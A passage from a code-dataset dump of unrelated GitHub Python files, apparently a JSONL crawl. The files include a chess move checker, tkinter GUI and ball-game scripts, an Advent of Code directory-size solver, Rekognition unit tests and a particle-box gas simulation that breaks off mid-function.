[journeyjson, timetablejson, stopsjson]\n prettyjsonfinal = json.dumps(jsonfinal, indent=4)\n\n\n\n with open(target_file_url, 'a') as targetfile:\n targetfile.write(prettyjsonfinal)\n #return the count of json files loaded\n c = len(prettyjsonfinal)\n return(c)\n\n\n\n\n\n","repo_name":"jaynyoni/hometest","sub_path":"scripts/importjson.py","file_name":"importjson.py","file_ext":"py","file_size_in_byte":5509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39843294818","text":"from Components import Cell, Board\n\n\nclass Chessfigure:\n _directions = []\n _color = None\n _value = None\n _hasMoved = False\n\n def __init__(self, color, value):\n self.set_color(color)\n self.set_value(value)\n\n def get_color(self):\n return self._color\n\n def set_color(self, value):\n self._color = value\n\n def get_value(self):\n return self._value\n\n def set_value(self, value):\n self._value = value\n\n def moved(self):\n self._hasMoved = True\n\n def is_knight(self):\n if self.__class__.__name__ == \"Knight\":\n return True\n return False\n\n def is_pawn(self):\n if self.get_value() == 1:\n return True\n return False\n\n def is_move_legal(self, source_cell: Cell, destination_cell: Cell, board: Board) -> bool:\n try:\n if source_cell.get_figure().get_color() == destination_cell.get_figure().get_color():\n return False\n except AttributeError:\n pass\n\n if source_cell.get_figure().is_knight() or source_cell.get_figure().is_pawn():\n if source_cell.get_figure().is_move_possible(source_cell, destination_cell):\n return True\n return False\n\n if source_cell.get_x() == destination_cell.get_x():\n if self.check_vertical(source_cell, destination_cell, board):\n return True\n return False\n elif source_cell.get_y() == destination_cell.get_y():\n if self.check_horziontal(source_cell, destination_cell, board):\n return True\n return False\n else:\n if self.check_diagonal(source_cell, destination_cell, board):\n return True\n return False\n\n def check_vertical(self, source: Cell, destination: Cell, board: Board) -> bool:\n stop = abs(source.get_y() - destination.get_y())\n if source.get_y() < destination.get_y():\n for y in range(stop):\n if board[source.get_y() + 1 + y][source.get_x()].get_figure() is not None:\n return False\n return True\n else:\n for y in range(stop):\n if board[source.get_y() - 1 - y][source.get_x()].get_figure() is not None:\n return False\n return True\n\n def check_horziontal(self, source: Cell, destination: Cell, board: Board) -> bool:\n stop = abs(source.get_x() - destination.get_x())\n if source.get_x() < destination.get_x():\n for x in range(stop):\n if board[source.get_y()][source.get_x() + 1 + x].get_figure() is not None:\n return False\n return True\n else:\n for x in range(stop):\n if board[source.get_y()][source.get_x() - 1 - x].get_figure() is not None:\n return False\n return True\n\n def check_diagonal(self, source: Cell, destination: Cell, board: Board) -> bool:\n stop = abs(source.get_x() - destination.get_x())\n if source.get_x() < destination.get_x() and source.get_y() < destination.get_y():\n for xy in range(stop):\n current_cell = board[source.get_y() + xy + 1][source.get_x() + xy + 1]\n if current_cell.get_figure() is not None:\n if current_cell == destination:\n return True\n return False\n return True\n elif source.get_x() < destination.get_x() and source.get_y() > destination.get_y():\n for xy in range(stop):\n current_cell = board[source.get_y() - xy - 1][source.get_x() + xy + 1]\n if current_cell.get_figure() is not None:\n if current_cell == destination:\n return True\n return False\n return True\n elif source.get_x() > destination.get_x() and source.get_y() > destination.get_y():\n for xy in range(stop):\n current_cell = board[source.get_y() - 1 - xy][source.get_x() - 1 - xy]\n if current_cell.get_figure() is not None:\n if current_cell == destination:\n return True\n return False\n return True\n elif source.get_x() > destination.get_x() and source.get_y() < destination.get_y():\n for xy in range(stop):\n current_cell = board[source.get_y() + 1 + xy][source.get_x() - 1 - xy]\n if current_cell.get_figure() is not None:\n if current_cell == destination:\n return True\n return False\n return True\n","repo_name":"voytech-47/chess","sub_path":"Figures/Chessfigure.py","file_name":"Chessfigure.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5985682450","text":"from tkinter import *\nimport tkinter as tk \n\nimport filetransferapp\n\n\nclass ParentWindow(Frame):\n def __init__(self, master, *args, **kwargs):\n Frame.__init__(self, master, *args, **kwargs)\n\n #define max and min size of frame\n self.master = master\n self.master.minsize(500, 230)\n self.master.maxsize(500, 230)\n # gives the master frame a name\n self.master.title(\"Daily File Transfer\")\n #background color\n self.master.configure(bg=\"lightpink\")\n\n filetransferapp.load_gui(self)\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n App = ParentWindow(root)\n root.mainloop()","repo_name":"zoekl7/FileTransferGUI","sub_path":"filetransfermain.py","file_name":"filetransfermain.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6343885467","text":"from tkinter import *\nimport random as rnd\n\nroot = Tk()\nroot.geometry('400x550')\ncanv = Canvas(root, bg = 'white')\ncanv.pack(fill=BOTH, expand=1)\nfield = [400, 500]\nfieldu = [400, 550]\n\npolygon = canv.create_rectangle(0, 0, field[0], field[1])\n\n\nclass Ball:\n default_state = [20, 20, 20, 20]\n default_r = 10\n default_color = 'red'\n def __init__(self, state=default_state, color=default_color, r=default_r):\n self.pos = [state[0], state[1]]\n self.vel = [state[2], state[3]]\n self.color = color\n self.r = r\n self.obj = canv.create_oval(0, 0, 0, 0)\n self.draw_ball()\n\n def draw_ball(self):\n canv.delete(self.obj)\n self.obj = canv.create_oval(\n self.pos[0] - self.r, self.pos[1] - self.r, \n self.pos[0] + self.r, self.pos[1] + self.r, \n fill = self.color)\n\n def move_ball(self, platform):\n self = hit(self, platform)\n self.pos = pos_step(self.pos, self.vel)\n self.vel = vel_step(self.vel, self.pos)\n \n def restart(self):\n self.pos = [self.default_state[0], self.default_state[1]]\n self.vel = [self.default_state[2], self.default_state[3]]\n\n#changes ball's velocity due to the different collisionss\ndef hit(ball, platform):\n ball = platform_hit(ball, platform)\n ball = floor_hit(ball)\n ball = wall_hit(ball)\n return ball\n\n#turnes ball's velocity if it hits the wall\ndef wall_hit(ball):\n if ball.pos[0]-ball.r<= 0 or ball.pos[0]+ball.r >= field[0]:\n ball.vel[0]*=-1\n if ball.pos[1]-ball.r <= 0 or ball.pos[1]+ball.r >= field[1]:\n ball.vel[1]*=-1\n return ball\n\ndef floor_hit(ball):\n if ball.pos[1] >= field[1]:\n ball.vel = [0, 0]\n #the_end(ball)\n return(ball)\n\ndef platform_hit(ball, platform):\n if (ball.pos[1] + ball.r > field[1] - 25 - platform.sizey and\n ball.pos[1] <= field[1]-25 and\n ball.pos[0]>=platform.x and \n ball.pos[0]<=platform.x + platform.sizex):\n ball.vel[1]*=-1\n ball.pos[1] = field[1] - 25 - platform.sizey - ball.r\n return(ball)\n\n\n#Draws game over screen \ndef the_end(ball):\n end = canv.create_rectangle(0, 0, field[0], field[1], fill = 'red')\n\n#changes coordinates of the ball along the timeline\ndef pos_step(pos, vel, dt=0.01):\n pos[0]+= vel[0]*dt\n pos[1]+= vel[1]*dt\n return pos\n\n#changes velocity of the ball along the timeline\ndef vel_step(vel, pos, dt=0.01):\n return vel\n\n#================================================\n\nclass Platform:\n def __init__(self, pos=field[0]*0.5, sizey=50, sizex = 10, color='black'):\n self.x = pos\n self.sizey = sizey\n self.sizex = sizex\n self.color = color\n self.draw_platform\n self.obj = canv.create_rectangle(0, 0, 0, 0)\n self.draw_platform()\n\n def draw_platform(self):\n canv.delete(self.obj)\n self.obj = canv.create_rectangle(\n self.x, field[1] - 25, self.x + self.sizey, field[1] - 25 - self.sizex,\n fill = self.color) \n \n def move_platform_right(self):\n self.x = pos_platform_step(self.x, self.sizey)\n def move_platform_left(self):\n self.x = pos_platform_step(self.x, -self.sizey)\n \n\n#=========================\ndef pos_platform_step(pos, vel, dt = 1):\n pos += vel*dt\n return pos\n\n#=========================\n\n\ndef platform_movement_buttons(platform):\n move_platform_right_button = Button(root, \n command = platform.move_platform_right, text = '-->')\n move_platform_left_button = Button(root, \n command = platform.move_platform_left, text = '<--')\n move_platform_right_button.place(x = fieldu[0] - 40, y = fieldu[1] - 40)\n move_platform_left_button.place(x = 0, y = fieldu[1] - 40)\n\ndef restart_buttons(ball, platform):\n btsize = 60\n restart_button = Button(root, command = ball.restart, text = 'ReStArT')\n restart_button.place(x = fieldu[0]/2 - btsize/2, y = fieldu[1] - 40)\n\ndef interface_init(ball, platform):\n restart_buttons(ball, platform)\n platform_movement_buttons(platform)","repo_name":"MakeevVlad/oldschoolgame","sub_path":"kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17780848182","text":"# from tqdm import tqdm\nfrom elf.io import open_file\nfrom cluster_tools.utils.volume_utils import blocks_in_volume, block_to_bb\n\n\ndef debug_vol():\n path = '../data.n5'\n key = 'volumes/cilia/segmentation'\n f = open_file(path)\n ds = f[key]\n shape = ds.shape\n block_shape = ds.chunks\n\n roi_begin = [7216, 12288, 7488]\n roi_end = [8640, 19040, 11392]\n\n blocks, blocking = blocks_in_volume(shape, block_shape, roi_begin, roi_end, return_blocking=True)\n print(\"Have\", len(blocks), \"blocks in roi\")\n\n # check reading all blocks\n for block_id in blocks:\n print(\"Check block\", block_id)\n block = blocking.getBlock(block_id)\n bb = block_to_bb(block)\n d = ds[bb]\n print(\"Have block\", block_id)\n\n print(\"All checks passsed\")\n\n\nif __name__ == '__main__':\n debug_vol()\n","repo_name":"mobie/platybrowser-project","sub_path":"segmentation/cilia/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"73910374970","text":"import typing\n\nimport utils\n\n# EXAMPLE = True\nEXAMPLE = False\n\n\nclass Command(typing.NamedTuple):\n command: str\n output: list[str]\n\n\nclass BaseFile:\n def __init__(self, name):\n self.name = name\n\n @property\n def size(self):\n raise NotImplementedError\n\n\nclass File(BaseFile):\n def __init__(self, name, size):\n super().__init__(name)\n self._size = size\n\n @property\n def size(self):\n return self._size\n\n\nclass Dir(BaseFile):\n def __init__(self, name, contents: list[BaseFile] = None):\n super().__init__(name)\n self._contents = contents or []\n\n @property\n def size(self):\n return sum(child.size for child in self._contents)\n\n def append(self, file: BaseFile):\n self._contents.append(file)\n\n\ndef load_data():\n data = utils.load_data(7, example=EXAMPLE)\n\n commands = []\n\n command = \"\"\n output = []\n\n for line in data:\n if line.startswith(\"$ \"):\n if command:\n commands.append(Command(command, output))\n command = line[2:]\n output = []\n else:\n output.append(line)\n\n if command:\n commands.append(Command(command, output))\n\n return commands\n\n\nDATA = load_data()\n\n\ndef to_path(cwd):\n return \"/\" + \"/\".join(cwd)\n\n\ndef get_dirs() -> dict[str, Dir]:\n cwd = []\n dirs: dict[str, Dir] = {\"/\": Dir(\"/\")}\n\n for command in DATA:\n if command.command == \"cd /\":\n cwd = []\n elif command.command == \"cd ..\":\n cwd.pop()\n elif command.command.startswith(\"cd \"):\n cwd.append(command.command[3:])\n elif command.command.startswith(\"ls\"):\n for line in command.output:\n details, name = line.split(\" \", maxsplit=1)\n if details == \"dir\":\n file = Dir(name)\n dirs[to_path(cwd + [name])] = file\n else:\n file = File(name, int(details))\n dirs[to_path(cwd)].append(file)\n\n return dirs\n\n\ndef part1() -> int:\n dirs = get_dirs()\n\n total = 0\n for dir_ in dirs.values():\n size = dir_.size\n if size <= 100000:\n total += size\n\n return total\n\n\ndef part2() -> int:\n available = 70000000\n need = 30000000\n\n dirs = get_dirs()\n used = dirs[\"/\"].size\n free = available - used\n\n space_needed = need - free\n\n print(used, free, space_needed)\n\n best = available\n for dir_ in dirs.values():\n size = dir_.size\n if size >= space_needed:\n best = min(size, best)\n\n return best\n\n\ndef main() -> None:\n with utils.timed():\n print(f\"Part 1: {part1()}\")\n with utils.timed():\n print(f\"Part 2: {part2()}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"apinkney97/aoc","sub_path":"aoc2022/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41268370666","text":"from src.services.rekognition_service import (\n detect_labels,\n process_labels,\n detect_text,\n process_text,\n)\nimport boto3\nfrom botocore.stub import Stubber\n\n\ndef test_detect_labels():\n rekognition = boto3.client(\"rekognition\")\n stubber = Stubber(rekognition)\n\n expected_response = {\n \"Labels\": [{\"Name\": \"Label1\"}, {\"Name\": \"Label2\"}, {\"Name\": \"Label3\"}]\n }\n\n stubber.add_response(\"detect_labels\", expected_response)\n\n with stubber:\n labels = detect_labels(\"bucket-name\", \"object-key\")\n\n assert labels == [\"Label1\", \"Label2\", \"Label3\"]\n\n\ndef test_process_labels():\n labels = [\"Label1\", \"Label2\", \"Label3\"]\n bucket_name = \"bucket-name\"\n object_key = \"object-key\"\n\n process_labels(labels, bucket_name, object_key)\n\n\ndef test_detect_text():\n rekognition = boto3.client(\"rekognition\")\n stubber = Stubber(rekognition)\n\n expected_response = {\n \"TextDetections\": [\n {\"DetectedText\": \"Time: 10:30 AM\"},\n {\"DetectedText\": \"Date: July 10, 2023\"},\n {\"DetectedText\": \"Temperature: 70°F\"},\n ]\n }\n\n stubber.add_response(\"detect_text\", expected_response)\n\n with stubber:\n texts = detect_text(\"bucket-name\", \"object-key\")\n\n assert texts == [\"Time: 10:30 AM\", \"Date: July 10, 2023\", \"Temperature: 70°F\"]\n\n\ndef test_process_text():\n texts = [\"Time: 10:30 AM\", \"Date: July 10, 2023\", \"Temperature: 25°C\"]\n bucket_name = \"bucket-name\"\n object_key = \"object-key\"\n\n process_text(texts, bucket_name, object_key)\n","repo_name":"justinhauer/rekognition_trail_cam","sub_path":"tests/services/test_rekognition_service.py","file_name":"test_rekognition_service.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29955917430","text":"import numpy as np\nimport sys\nfrom matplotlib.collections import EllipseCollection\nfrom matplotlib.patches import Polygon\nfrom matplotlib import pyplot as plt\nfrom matplotlib import animation\nfrom scipy.spatial.distance import squareform, pdist\n\n\ndef norm(x):\n return np.sqrt(np.dot(x, x))\n\n\ndef sqrt(x):\n \"\"\"Safe square root\"\"\"\n return np.sqrt(np.clip(x, 0, np.inf))\n\n\nclass VelocityPanel(object):\n \"\"\"\n A display panel in addition to the box. Here, showing velocity histogram\n \"\"\"\n def __init__(self, box):\n self.box = box\n self.cbox = box.cbox\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n self.ax.clear()\n b = self.box\n cb = self.cbox\n ax.set_xlabel('velocity along x')\n ax.get_yaxis().set_visible(False)\n f, bins = np.histogram(cb.v[:, 0], int(np.sqrt(cb.N)), range=(cb.vxmin, cb.vxmax), density=True)\n binwidth = bins[1] - bins[0]\n\n # Create bar graph\n self.vhist = ax.bar(bins[:-1], f, width=binwidth, align='edge')\n\n p0 = ax.get_position()\n p1 = ax.get_position()\n ax.set_position([p1.x0, p0.y0, p0.width, p0.height])\n return self.vhist,\n\n def update(self, i):\n b = self.box\n cb = self.cbox\n\n # Recompute histogram\n nbins = len(self.vhist)\n f, bins = np.histogram(cb.v[:, 0], nbins, range=(cb.vxmin, cb.vxmax), density=True)\n self.ax.set_xlim(cb.vxmin, cb.vxmax)\n binwidth = bins[1] - bins[0]\n\n # Update histogram\n for i in range(nbins):\n self.vhist[i].set_height(f[i])\n self.vhist[i].set_width(binwidth)\n self.vhist[i].set_facecolor(b.cm((bins[i] + .5 * binwidth) ** 2 / cb.v2max))\n self.vhist[i].set_x(bins[i])\n # Adjust vertical extent.\n ylim = self.ax.get_ylim()[1]\n dylim = 1.2 * f.max() - ylim\n if abs(dylim) > .1 * ylim:\n new_ylim = ylim + .1 * (dylim)\n self.ax.set_ylim(ymax=new_ylim)\n\n return self.vhist,\n\nclass SpeedPanel(object):\n \"\"\"\n A display panel in addition to the box. Here, showing velocity histogram\n \"\"\"\n def __init__(self, box):\n self.box = box\n self.cbox = box.cbox\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n self.ax.clear()\n b = self.box\n cb = self.cbox\n\n ax.set_xlabel('velocity along x')\n ax.get_yaxis().set_visible(False)\n f, bins = np.histogram(np.sqrt((cb.v ** 2).sum(axis=1)), int(np.sqrt(cb.N)),\n range=(0., cb.v2max), density=True)\n binwidth = bins[1] - bins[0]\n\n # Create bar graph\n self.vhist = ax.bar(bins[:-1], f, width=binwidth, align='edge')\n\n p0 = ax.get_position()\n p1 = ax.get_position()\n ax.set_position([p1.x0, p0.y0, p0.width, p0.height])\n return self.vhist,\n\n def update(self, i):\n b = self.box\n cb = self.cbox\n\n # Recompute histogram\n nbins = len(self.vhist)\n f, bins = np.histogram(np.sqrt((cb.v**2).sum(axis=1)), nbins, range=(0, cb.v2max), density=True)\n self.ax.set_xlim(0, cb.v2max)\n binwidth = bins[1] - bins[0]\n\n # Update histogram\n for i in range(nbins):\n self.vhist[i].set_height(f[i])\n self.vhist[i].set_width(binwidth)\n self.vhist[i].set_facecolor(b.cm((bins[i] + .5 * binwidth) ** 2 / cb.v2max))\n self.vhist[i].set_x(bins[i])\n # Adjust vertical extent.\n ylim = self.ax.get_ylim()[1]\n dylim = 1.2 * f.max() - ylim\n if abs(dylim) > .1 * ylim:\n new_ylim = ylim + .1 * (dylim)\n self.ax.set_ylim(ymax=new_ylim)\n\n return self.vhist,\n\nclass MFPPanel(object):\n \"\"\"\n A display panel in addition to the box. Here, showing mean free path plot\n \"\"\"\n\n def __init__(self, box):\n self.box = box\n self.cbox = box.cbox\n self.trace_length = 1\n self.nbins = 30\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n ax.clear()\n b = self.box\n cb = self.cbox\n\n ax.set_xlabel('free path')\n ax.get_yaxis().set_visible(False)\n ax.set_ylim(ymin=0.)\n f, bins = np.histogram([], self.nbins, range=(0, 3*cb.mfp), density=True)\n binwidth = bins[1] - bins[0]\n\n # Create bar graph\n self.vhist = ax.bar(bins[:-1], f, width=binwidth, align='edge')\n\n p0 = ax.get_position()\n p1 = ax.get_position()\n ax.set_position([p1.x0, p0.y0, p0.width, p0.height])\n return self.vhist,\n\n def update(self, i):\n b = self.box\n cb = self.cbox\n\n # Recompute histogram\n x, y = cb.trace.get_data()\n if len(x) <= self.trace_length:\n # Nothing to do\n return self.vhist,\n self.trace_length = len(x)\n paths = np.sqrt(np.diff(x)**2 + np.diff(y)**2)\n xlim = max(3*cb.mfp, paths.max())\n f, bins = np.histogram(paths, self.nbins, range=(0, xlim), density=True)\n self.ax.set_xlim(0, xlim)\n binwidth = bins[1] - bins[0]\n\n # Update histogram\n for i in range(self.nbins):\n self.vhist[i].set_height(f[i])\n self.vhist[i].set_width(binwidth)\n self.vhist[i].set_x(bins[i])\n\n # Adjust vertical extent\n self.ax.set_ylim(ymax=1.2*f.max())\n\n return self.vhist,\n\nclass PressurePanel(object):\n \"\"\"\n A display panel in addition to the box. Here, showing cumulative momentum on one of the walls\n \"\"\"\n\n def __init__(self, box):\n self.box = box\n self.cbox = box.cbox\n self.trace_length = 1\n self.nbins = 30\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n ax.clear()\n self.cbox._pressure = 0\n self.plot_pressure = ax.plot([0], [0], 'b-', label='Total momentum')[0]\n self.plot_pressure_theory = ax.plot([0, 0], [0, 0], 'k-', label='Total momentum (theory)')[0]\n ax.legend(loc='upper left')\n ax.set_xlabel('time')\n ax.set_ylabel('momentum')\n ax.set_ylim(ymin=0.)\n\n p0 = ax.get_position()\n p1 = ax.get_position()\n ax.set_position([p1.x0, p0.y0, p0.width, p0.height])\n return self.plot_pressure, self.plot_pressure_theory\n\n def update(self, i):\n b = self.box\n cb = self.cbox\n\n # Update plot data\n self.plot_pressure.set_data(cb._pressure_t, cb._wall_momentum)\n self.plot_pressure_theory.set_data([0, cb._pressure_t[-1]], [0, cb._wall_momentum_theory])\n self.ax.set_xlim(0, cb._pressure_t[-1])\n self.ax.set_ylim(np.min(cb._wall_momentum), np.max(cb._wall_momentum))\n return self.plot_pressure, self.plot_pressure_theory\n\nclass TimePanel(object):\n \"\"\"\n A display panel in addition to the box. Here, showing mean free path plot\n \"\"\"\n\n def __init__(self, box):\n self.box = box\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n ax.clear()\n b = self.box\n\n def update(self, i):\n b = self.box\n\n\nclass Box(object):\n\n def __init__(self, cbox, **kwargs):\n \"\"\"\n Wrapper for a CBox implementing visualisation.\n \"\"\"\n self.cbox = cbox\n\n self.fig = plt.figure()\n\n self.panel = None\n\n self.show_trace = None\n self.show_quiver = None\n self.quiver_scale = 35.\n\n # For molecule trace\n self._vtrace = None\n\n # Default coloring\n self.colors = 'velocities'\n\n self._colors = None\n\n self.cids = []\n\n # Create display\n self._init()\n\n self._i = None\n self.animobj = None\n self.interval = 5.\n\n self.highlight_rule = None\n\n self._update_callback = None\n\n @classmethod\n def generic(cls, N=150, L=200., D=3., T=1., ndim=2):\n \"\"\"\n Create a generic box with a given number of particles, given diameter, box dimensions and reduced temperature.\n self.N = N # number of particles\n \"\"\"\n if np.isscalar(L):\n L = L*np.ones((ndim,))\n\n # Positions\n r = np.array([L[i]*np.random.uniform(size=(N,)) for i in range(ndim)]).T\n\n # Masses\n m = np.ones((N,))\n\n # Diameters\n d = D*np.ones((N,))\n\n # Velocities\n v = np.random.normal(size=(N, ndim))\n v /= np.sqrt((v**2).sum()/N)\n v *= np.sqrt(2*T/m[:, np.newaxis])\n\n cbox = CBox(L, r, v, d, m)\n\n return cls(cbox)\n\n def run(self, nsteps=100000, filename=None, blit=False, block=None):\n \"\"\"Start animation\n\n nsteps: number of steps\n filename: if not None, movie file to save to (work in progress)\n blit: False by default, does not work always\n block: if True, return only after run is done, if False return immediately\n if None, returns only in interactive mode\n \"\"\"\n self._i = 0\n self.nsteps = nsteps\n self.animobj = animation.FuncAnimation(self.fig, self._update, frames=nsteps, interval=self.interval, repeat=False, blit=blit)\n if filename is not None:\n Writer = animation.writers['ffmpeg']\n writer = Writer(fps=150, bitrate=500, extra_args=['-filter', 'tblend', '-r', '25'])\n self.animobj._start()\n self.animobj.save(filename, writer=writer)\n else:\n self.animobj._start()\n plt.show(block=False)\n if block or ((block is None) and not hasattr(sys, 'ps1')):\n plt.pause(.1)\n while self.animobj.event_source and self.animobj.event_source.callbacks:\n plt.pause(.1)\n\n def stop(self):\n try:\n self.animobj._stop()\n except:\n pass\n\n def _init(self):\n \"\"\"\n Initialise display\n \"\"\"\n cb = self.cbox\n\n # No update during setup\n plt.ioff()\n self.fig.clear()\n\n if self.panel is not None:\n # Create two side-by-side axes, with a histogram of the x-component of the velodicities in the second one.\n axes = [self.fig.add_subplot(121, aspect='equal', adjustable='box'),\n self.fig.add_subplot(122)]\n else:\n # Create just one axis - the particle box\n axes = [self.fig.add_subplot(111, aspect='equal', adjustable='box')]\n\n # Set box size and axis properties\n axes[0].axis([0, cb.L[0], 0, cb.L[1]])\n axes[0].get_xaxis().set_visible(False)\n axes[0].get_yaxis().set_visible(False)\n\n # Draw particles\n circles = EllipseCollection(widths=cb.d, heights=cb.d, angles=0, units='xy',\n facecolors='k', offsets=cb.r, transOffset=axes[0].transData)\n axes[0].add_collection(circles)\n\n # Create colormap\n self.cm = plt.get_cmap('plasma')\n\n self.fig.tight_layout()\n self.circles = circles\n\n to_return = (circles,)\n\n # Option to show the trace of one particle (to illustrate random walk)\n if self.show_trace is not None:\n i = self.show_trace\n self.trace = axes[0].plot([cb.r[i, 0]], [cb.r[i,1]], 'k-')[0]\n self._vtrace = cb.v[i].copy()\n to_return += (self.trace,)\n\n # Option to show velocity arrows\n if self.show_quiver:\n quiver = plt.quiver(cb.r[:, 0], cb.r[:, 1], cb.v[:, 0], cb.v[:, 1], units='xy', scale=self.quiver_scale*cb.vRMS/cb.L.mean())\n self.quiver = quiver\n to_return += (quiver,)\n\n self.axes = axes\n\n if self.panel is not None:\n to_return += self.panel.init(axes[1])\n\n # Process all obstacles (polygons)\n if cb.obstacles:\n for obs in cb.obstacles:\n vc = obs['vertices']\n axes[0].add_patch(Polygon(vc, facecolor='black'))\n\n # (re)connect events\n self._connect()\n\n return to_return\n\n def set_fig_position(self, x, y, dx, dy):\n \"\"\"Set figure windoe position (might work only with QT backend)\"\"\"\n plt.get_current_fig_manager().window.setGeometry(x, y, dx, dy)\n\n def set_colors(self, colors=None):\n if colors is None:\n colors = self._colors\n else:\n self._colors = colors\n self.circles.set_facecolors(colors)\n\n def _connect(self):\n \"\"\"\n Manage event connections\n FIXME: This does not work.\n \"\"\"\n canvas = self.fig.canvas\n # Disconnect eventual connections\n for cid in self.cids:\n canvas.mpl_disconnect(cid)\n # Reconnect\n self.cids.append(canvas.mpl_connect('button_press_event', self.onpress))\n self.cids.append(canvas.mpl_connect('key_press_event', self.onkeypress))\n self.cids.append(canvas.mpl_connect('close_event', self.onclose))\n self.cids.append(canvas.mpl_connect('scroll_event', self.onscroll))\n return\n\n def onpress(self, event):\n pass\n\n def onkeypress(self, event):\n if event.key in ['space']:\n print('blip!')\n #self.animobj._stop()\n\n def onclose(self, event):\n pass\n\n def onscroll(self, event):\n pass\n\n def _update(self, i):\n \"\"\"Update plot\"\"\"\n cb = self.cbox\n\n self.i = i\n\n # Compute move\n cb.step()\n\n # Move molecules\n self.circles.set_offsets(cb.r)\n\n # Change colours\n if self.colors == 'velocities':\n vmag = np.sqrt((cb.v**2).sum(axis=1))\n self.set_colors(self.cm(vmag/cb.v2max))\n\n to_return = (self.circles,)\n\n if self.panel is not None:\n to_return += self.panel.update(i)\n\n if self.show_trace is not None:\n i = self.show_trace\n newv = cb.v[i]\n x, y = self.trace.get_data()\n if not np.allclose(self._vtrace, newv):\n x = np.append(x, cb.r[i,0])\n y = np.append(y, cb.r[i,1])\n else:\n x[-1] = cb.r[i,0]\n y[-1] = cb.r[i,1]\n self.trace.set_data(x,y)\n self._vtrace = newv.copy()\n to_return += (self.trace,)\n\n if self.show_quiver:\n self.quiver.set_offsets(cb.r)\n self.quiver.set_UVC(cb.v[:, 0], cb.v[:, 1])\n to_return += (self.quiver,)\n\n if self.highlight_rule:\n highlighted = eval(self.highlight_rule, cb.__dict__)\n lw = 5.\n self.circles.set_lw([lw if h else 0. for h in highlighted])\n self.circles.set_edgecolors(['yellow' if h else 'black' for h in highlighted])\n if self.show_quiver:\n self.quiver.set_UVC(highlighted*cb.v[:, 0], highlighted*cb.v[:, 1])\n\n if self._update_callback is not None:\n self._update_callback(i)\n\n return to_return\n\n def show(self):\n plt.ion()\n\n\nclass CBox(object):\n\n def __init__(self, L, r, v, d, m, **kwargs):\n \"\"\"\n Create a box with particles inside.\n \"\"\"\n N, ndim = r.shape\n if np.isscalar(L):\n L = L*np.ones((ndim,))\n\n self.N = N\n self.ndim = ndim\n self.L = L\n self.r = r\n self.v = v\n self.d = d\n self.m = m\n\n self.bounds = [[0, L[i]] for i in range(ndim)]\n\n # Initialise time\n self.t = 0.\n\n # Number of steps (defined in run)\n self.nsteps = None\n\n # Total time and time step (computed in init)\n self.dt = None\n self.t = 0.\n self.i = 0\n\n # Mean free path\n self.mfp = None\n\n # Initialise other necessary attributes\n self.r0 = None # This will store the previous positions\n self.v0 = None # For previous velocities\n\n # Gravity\n self.g = 0.\n\n # Velocity statistics\n self.v2max = None\n self.vxmin, self.vxmax = None, None\n self.vymin, self.vymax = None, None\n\n # For pressure calculation\n self._pressure = None\n self._wall_momentum = [0.]\n self._wall_momentum_theory = 0.\n self._pressure_t = [0.]\n\n # Real volume\n self.real_volume = None\n\n # For obstacle collisions\n self.obstacles = []\n\n # Callbacks\n self._collision_callback = None\n self._walls_callback = None\n self._obs_callback = None\n\n self.init()\n\n @classmethod\n def generic(cls, N=150, L=200., D=3., T=1., ndim=2):\n \"\"\"\n Create a generic box with a given number of particles, given diameter, box dimensions and reduced temperature.\n self.N = N # number of particles\n \"\"\"\n if np.isscalar(L):\n L = L*np.ones((ndim,))\n\n # Positions\n r = np.array([L[i]*np.random.uniform(size=(N,)) for i in range(ndim)]).T\n\n # Masses\n m = np.ones((N,))\n\n # Diameters\n d = D*np.ones((N,))\n\n # Velocities\n v = np.random.normal(size=(N, ndim))\n v /= np.sqrt((v**2).sum()/N)\n v *= np.sqrt(2*T/m[:, np.newaxis])\n\n return cls(L, r, v, d, m)\n\n @property\n def T(self):\n \"\"\"Temperature\"\"\"\n return (.5*self.m * (self.v**2).sum(axis=1)).mean()\n\n @property\n def vRMS(self):\n \"\"\"RMS velocity\"\"\"\n return np.sqrt((self.v**2).sum(axis=1).mean())\n\n @property\n def P(self):\n \"\"\"Pressure - in 2D, P = U/A\"\"\"\n return (.5*self.m * (self.v**2).sum(axis=1)).sum() / self.real_volume\n\n def init(self):\n \"\"\"\n Reinitialise all quantities.\n \"\"\"\n # Velocity statistics\n self.v2max = np.sqrt((self.v**2).sum(axis=1)).max()\n self.vxmin, self.vxmax = self.v[:, 0].min(), self.v[:, 0].max()\n self.vymin, self.vymax = self.v[:, 1].min(), self.v[:, 1].max()\n\n # Optimal time step ~ .25 * (D/v_RMS)\n self.dt = .25*self.d.mean()/np.sqrt(2*(self.v**2).mean())\n\n # Mean free path\n self.mfp = np.prod(self.L)/(4.*self.N*self.d.mean())\n\n # Volume\n self.real_volume = np.prod(self.L-self.d.mean()) - .5*np.pi*sum(self.d**2)\n\n # For pressure calculation\n self._pressure = None\n self._wall_momentum = [0.]\n self._wall_momentum_theory = 0.\n self._pressure_t = [0.]\n\n def add_obstacle(self, vc):\n \"\"\"\n Add an obstacle (convex polygon defined by vertices vc).\n \"\"\"\n # Construct edges info\n edges = []\n for i in range(len(vc)):\n a = vc[i] - vc[i-1]\n n = np.array([-a[1], a[0]])\n n /= norm(n)\n edges.append((n, np.dot(n, 